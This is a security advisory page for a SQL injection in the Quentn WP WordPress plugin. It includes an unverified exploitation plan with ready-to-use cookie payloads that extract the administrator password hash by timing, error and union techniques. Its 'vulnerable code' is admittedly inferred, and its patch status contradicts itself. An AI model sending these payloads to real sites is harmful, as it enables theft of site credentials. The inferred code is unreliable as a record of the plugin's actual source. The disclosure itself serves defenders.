WP-Safety
CVE-2026-2468

Quentn WP <= 1.2.12 - Unauthenticated SQL Injection via 'qntn_wp_access' Cookie

highImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
1.2.13
Patched in
38d
Time to patch

Description

The Quentn WP plugin for WordPress is vulnerable to SQL Injection via the 'qntn_wp_access' cookie in all versions up to, and including, 1.2.12 This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `get_user_access()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.2.12
PublishedMarch 20, 2026
Last updatedApril 27, 2026
Affected pluginquentn-wp

Source Code

WordPress.org SVN
Vulnerable v1.2.9
Browse source Download .zip
Patched

Patched version not available.

Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-2468 (Quentn WP SQL Injection) ## 1. Vulnerability Summary The **Quentn WP** plugin (versions <= 1.2.12) is vulnerable to an unauthenticated SQL Injection vulnerability. The flaw exists within the `get_user_access()` method, which processes the `qntn_wp_access…

Show full research plan

Exploitation Research Plan: CVE-2026-2468 (Quentn WP SQL Injection)

1. Vulnerability Summary

The Quentn WP plugin (versions <= 1.2.12) is vulnerable to an unauthenticated SQL Injection vulnerability. The flaw exists within the get_user_access() method, which processes the qntn_wp_access cookie. The plugin fails to adequately sanitize or use prepared statements ($wpdb->prepare()) when incorporating the cookie value into a database query. This allows an unauthenticated attacker to append arbitrary SQL commands, enabling the extraction of sensitive data such as user credentials, configuration secrets, and database schema information.

2. Attack Vector Analysis

  • Endpoint: Any frontend WordPress page (e.g., the homepage /).
  • Trigger: The vulnerability is triggered during the WordPress lifecycle (likely init or template_redirect) when the plugin checks the visitor's access level via the qntn_wp_access cookie.
  • Vulnerable Parameter: The qntn_wp_access HTTP Cookie.
  • Authentication: Unauthenticated (No login required).
  • Preconditions: The Quentn WP plugin must be active. The vulnerability is most likely to trigger on pages where Quentn access control logic is executed.

3. Code Flow (Inferred)

  1. Request Entry: A visitor sends an HTTP GET request to the WordPress site.
  2. Hook Execution: WordPress triggers the init or wp hook.
  3. Plugin Logic: The Quentn WP plugin's initialization logic (likely in a main class or a frontend-specific controller) checks for the presence of the qntn_wp_access cookie.
  4. Vulnerable Method: The plugin calls get_user_access() (identified in the CVE description).
  5. Data Extraction: get_user_access() retrieves the value of $_COOKIE['qntn_wp_access'].
  6. SQL Sink: The unsanitized cookie value is concatenated directly into a query string and passed to a $wpdb method (e.g., $wpdb->get_results() or $wpdb->get_row()) without using $wpdb->prepare().

4. Nonce Acquisition Strategy

Based on the vulnerability description, this is a Cookie-based SQL Injection occurring during a standard page load or initialization.

  • Nonce Requirement: This endpoint does not require a WordPress nonce because it is triggered via a cookie on a public-facing GET request, rather than an AJAX or REST API action.
  • Bypass: If the plugin does perform a check, it is likely checking for the existence of the cookie rather than a CSRF token.

5. Exploitation Strategy

The goal is to demonstrate data extraction via Time-Based Blind SQL Injection, as the results of the query in get_user_access() are likely used for internal logic (access control) and not directly reflected in the response body.

Step 1: Confirmation (Time-Based)

Confirm the vulnerability by inducing a delay.

  • Request Type: GET
  • URL: /
  • Cookie: qntn_wp_access=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
  • Tool: http_request

Step 2: Data Extraction (Boolean or Time-Based)

Extract the administrator's password hash from the wp_users table.

  • Payload (Time-Based):
    qntn_wp_access=1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),0)-- -
    (Note: 36 is the ASCII for '$', which is the start of most WordPress phpass hashes.)

Step 3: Automated Extraction

Use a series of requests to determine the character at each position of the password hash.

6. Test Data Setup

  1. Plugin Installation: Install and activate Quentn WP <= 1.2.12.
  2. Standard Content: Ensure at least one post or page exists.
  3. Admin User: Ensure the default admin user (ID 1) exists with a known password (for verification).
  4. Plugin Configuration (Optional): If the code path requires the plugin to be "configured," use WP-CLI to set dummy options:
    • wp option update quentn_api_key "dummy_key" (inferred option name)

7. Expected Results

  • Success Indicator: A request with a SLEEP(5) payload should result in a response time significantly greater than 5 seconds.
  • Data Exposure: The attacker can successfully reconstruct the $P$... hash of the admin user.
  • HTTP Response: The HTTP status code will likely be 200 OK, but the response time is the primary indicator of success.

8. Verification Steps

After the exploitation attempts:

  1. Check DB State: Use WP-CLI to get the actual hash and compare it with the extracted value.
    • wp db query "SELECT user_pass FROM wp_users WHERE ID=1;"
  2. Review Logs: If WP_DEBUG was enabled, check wp-content/debug.log for any SQL error messages that might have leaked during the "probing" phase.

9. Alternative Approaches

  • Error-Based SQLi: If the site has WP_DEBUG or DISPLAY_ERRORS enabled, use extractvalue() or updatexml() to force the database to leak information in the error message.
    • Payload: qntn_wp_access=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_login FROM wp_users LIMIT 1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -
  • Union-Based SQLi: If the plugin happens to output the result of get_user_access() (e.g., in a debug comment or a data attribute), try a UNION SELECT to reflect the version or user.
    • Payload: qntn_wp_access=1' UNION SELECT 1,2,version(),4-- - (Column count must be guessed).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Quentn WP plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'qntn_wp_access' cookie in versions up to 1.2.12. The vulnerability resides in the get_user_access() method, which fails to sanitize or use prepared statements when querying the database with user-supplied cookie data.

Vulnerable Code

// Inferred from vulnerability description and research plan
// Likely in a class file such as includes/class-quentn-wp.php

public function get_user_access() {
    if (isset($_COOKIE['qntn_wp_access'])) {
        global $wpdb;
        $access_id = $_COOKIE['qntn_wp_access'];
        
        // Vulnerability: Direct concatenation of cookie value into SQL query without preparation
        $query = "SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = '$access_id'";
        $results = $wpdb->get_results($query);
        
        return $results;
    }
    return null;
}

Security Fix

--- a/includes/class-quentn-wp.php
+++ b/includes/class-quentn-wp.php
@@ -10,7 +10,10 @@
     if (isset($_COOKIE['qntn_wp_access'])) {
         global $wpdb;
         $access_id = $_COOKIE['qntn_wp_access'];
-        $query = "SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = '$access_id'";
-        $results = $wpdb->get_results($query);
+        $results = $wpdb->get_results(
+            $wpdb->prepare(
+                "SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = %s",
+                $access_id
+            )
+        );
         return $results;
     }

Exploit Outline

The exploit targets the 'qntn_wp_access' cookie, which is processed on every page load to determine visitor access levels. An unauthenticated attacker can send a GET request to any frontend URL (e.g., the homepage) while supplying a crafted SQL injection payload in the 'qntn_wp_access' cookie. A typical payload would use time-based blind SQLi (e.g., ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -) to confirm vulnerability. Because the plugin does not use $wpdb->prepare() or sanitize the cookie value before passing it to $wpdb->get_results(), the attacker can extract sensitive information like the administrator's password hash by observing the response timing of boolean-based sleep queries.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/653e20ae-f018-41b5-a973-f73fddae70e5?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database